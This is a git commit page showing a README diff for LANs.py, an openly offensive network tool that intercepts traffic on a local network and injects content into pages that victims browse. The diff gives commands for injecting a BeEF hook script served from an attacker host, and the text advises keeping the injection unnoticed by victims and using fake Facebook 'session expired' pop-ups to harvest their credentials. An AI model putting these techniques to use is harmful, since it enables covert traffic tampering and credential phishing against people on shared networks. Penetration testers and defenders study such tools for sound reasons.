github/LANs.py
1
0
Fork 0
mirror of https://github.com/DanMcInerney/LANs.py.git synced 2025-07-07 21:42:12 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

readme

Browse source
This commit is contained in:
DanMcInerney 2013-11-07 13:06:58 -07:00
parent 1bc74e6f2f
commit 528d30a952
1 changed files with 7 additions and 10 deletions
Download patch file Download diff file Expand all files Collapse all files

17
README.md
View file

@ -43,8 +43,8 @@ HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
```
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. Injecting HTML undetected is a dicey game, if a minor thing goes wrong then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF
panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just give it a few minutes. The goal is to be unintrusive. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits.
```
python LANs.py -c '<title>Owned.</title>'
@ -59,7 +59,7 @@ Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
```
To read from a pcap file you must include the target's IP address with the -ip option
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway.
Aggressive usage:
@ -108,12 +108,9 @@ Cleans the following on Ctrl-C:
To do:
-Add ability to read from pcap file
Technical details:
This script uses python an nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.